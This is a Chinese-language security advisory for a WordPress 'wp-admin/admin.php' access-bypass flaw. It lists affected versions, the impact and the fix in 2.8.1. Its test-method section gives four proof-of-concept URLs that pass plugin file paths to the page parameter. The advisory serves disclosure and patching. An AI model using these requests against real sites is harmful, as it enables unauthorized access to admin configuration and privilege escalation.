WordPress ‘wp-admin/admin.php’模块配置安全绕过漏洞

漏洞起因
访问验证错误
 
影响系统
WordPress WordPress MU 2.7.1
WordPress WordPress MU 2.7
WordPress WordPress MU 2.6
WordPress WordPress 2.6.5
WordPress WordPress 2.6.2
WordPress WordPress 2.6.1
WordPress WordPress 2.5.1
WordPress WordPress 2.3.3
WordPress WordPress 2.3.2
WordPress WordPress 2.3.1
WordPress WordPress 2.2.3
WordPress WordPress 2.2.2
WordPress WordPress 2.2.1
WordPress WordPress 2.2.1
WordPress WordPress 2.1.3
WordPress WordPress 2.1.3
WordPress WordPress 2.1.2
WordPress WordPress 2.1.1
WordPress WordPress 2.0.11
WordPress WordPress 2.0.10
WordPress WordPress 2.0.7
WordPress WordPress 2.0.6
WordPress WordPress 2.0.5
WordPress WordPress 2.0.4
WordPress WordPress 2.0.3
WordPress WordPress 2.0.2
WordPress WordPress 2.0.1
WordPress WordPress 2.0
WordPress WordPress 2.8
WordPress WordPress 2.6
WordPress WordPress 2.5
WordPress WordPress 2.3
WordPress WordPress 2.2 Revision 5003
WordPress WordPress 2.2 Revision 5002
WordPress WordPress 2.2
WordPress WordPress 2.1.3-RC2
WordPress WordPress 2.1.3-RC1
WordPress WordPress 2.1
WordPress WordPress 2.0.10-RC2
WordPress WordPress 2.0.10-RC1
 
不受影响系统
WordPress WordPress MU 2.8.1
WordPress WordPress 2.8.1
 
危害
远程攻击者可以利用漏洞获得对部分配置脚本的访问,导致敏感信息泄漏或提升特权。
 
攻击所需条件
攻击者必须访问WordPress。
 
漏洞信息
WordPress是一款流行的blog系统。
WordPress存在安全绕过问题,远程攻击者可以利用漏洞获得对部分配置脚本的访问,导致敏感信息泄漏或提升特权。
WordPress处理部分URL请求存在问题,非特权用户可以查看插件配置页内容,也可以修改部分插件内容和注入JavaScript代码。
 
测试方法
http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php
 
厂商解决方案
WordPress WordPress MU和WordPress WordPress 2.8.1已经修正此漏洞:
http://wordpress.org/
http://mu.wordpress.org/
 
漏洞提供者
Fernando Arnaboldi from Core Security Technologies
  
 

发表评论?

0 条评论。

发表评论